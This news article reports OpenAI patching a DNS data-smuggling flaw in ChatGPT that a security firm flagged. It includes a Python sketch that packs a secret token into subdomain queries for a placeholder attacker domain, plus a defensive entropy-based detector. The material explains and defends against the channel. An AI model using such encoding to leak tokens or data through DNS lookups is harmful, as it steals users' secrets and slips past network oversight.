OpenAI ChatGPT fixes DNS data smuggling flaw
Source: HN
OpenAI has rolled out a patch that closes a DNS‑based data‑smuggling vulnerability discovered in ChatGPT earlier this year. The flaw allowed the model to embed user‑provided content in DNS queries, effectively turning the service into a covert exfiltration channel. Security firm Check Point flagged the issue in February, noting that malicious actors could have leveraged the side‑channel to siphon text, code snippets or even authentication tokens without the user’s knowledge.
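Check Point has not published the exact encoding it observed, but DNS data smuggling generically works by packing stolen bytes into the subdomain labels of lookups for an attacker-controlled domain; the attacker's authoritative name server then receives the payload as "legitimate" resolution traffic. A minimal sketch of that encoding, with a hypothetical attacker domain:

```python
import base64

MAX_LABEL = 63  # DNS limits each label to 63 characters (RFC 1035)

def encode_exfil_queries(secret: bytes, attacker_domain: str) -> list[str]:
    """Split a secret into DNS-safe chunks and build query names.

    Each hostname, if resolved, leaks one chunk of the secret to
    whoever runs the authoritative server for attacker_domain.
    """
    # Base32 keeps the payload within DNS's case-insensitive,
    # alphanumeric label alphabet; padding is stripped and restored
    # on the receiving side.
    payload = base64.b32encode(secret).decode().rstrip("=")
    chunks = [payload[i:i + MAX_LABEL]
              for i in range(0, len(payload), MAX_LABEL)]
    # A sequence-number label lets the receiver reassemble in order.
    return [f"{i}.{chunk}.{attacker_domain}"
            for i, chunk in enumerate(chunks)]

# "evil.example.com" is a placeholder attacker domain for illustration.
queries = encode_exfil_queries(b"api_token=sk-12345", "evil.example.com")
```

Because resolvers forward such queries out of even tightly firewalled networks, the channel needs no direct connection to the attacker, which is what makes it attractive for siphoning tokens unnoticed.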
The fix arrives just weeks after OpenAI disclosed a separate breach in its Codex code‑generation model that exposed GitHub tokens, a problem detailed in our March 31 report on the “Critical Vulnerability in OpenAI Codex.” Both incidents underscore a growing attack surface in generative AI platforms, where the very flexibility that powers useful features also creates obscure pathways for data leakage. Enterprises that embed ChatGPT in internal workflows or customer‑facing applications now face heightened scrutiny over how AI services handle outbound traffic.
OpenAI’s response includes stricter validation of DNS requests generated by the model and tighter sandboxing of user prompts. The company also pledged to expand its “security‑by‑design” program, promising regular audits of side‑channel risks across its product suite. Analysts say the patch is a positive step but warn that the rapid integration of AI into critical systems makes continuous monitoring essential.
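OpenAI has not detailed its validation logic, but one common heuristic for this class of defense is to flag outbound hostnames whose labels look like encoded payloads: long, high-entropy strings or unusually deep subdomain chains. A sketch of that idea, with illustrative (not OpenAI's) thresholds:

```python
import math
from collections import Counter

def shannon_entropy(s: str) -> float:
    """Bits of entropy per character in the string."""
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())

def looks_like_smuggling(hostname: str,
                         max_label_entropy: float = 3.5,
                         max_labels: int = 6) -> bool:
    """Flag hostnames whose labels resemble encoded payloads.

    Thresholds are illustrative; real deployments tune them against
    observed benign traffic to control false positives.
    """
    labels = hostname.rstrip(".").split(".")
    if len(labels) > max_labels:
        return True  # unusually deep subdomain chains
    # Long, high-entropy labels often indicate base32/base64 data.
    return any(len(label) > 20 and shannon_entropy(label) > max_label_entropy
               for label in labels)
```

Entropy checks alone cannot catch low-and-slow exfiltration (a few bytes per query), which is why analysts pair them with the continuous monitoring mentioned above.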
What to watch next: whether OpenAI will publish a detailed post‑mortem and timeline for the vulnerability, and how regulators in the EU and Nordic region will treat AI‑related data‑exfiltration risks under emerging AI‑specific legislation. Competitors such as Meta AI and Google’s Gemini are likely to audit their own DNS handling, potentially sparking a broader industry push for transparent AI security standards.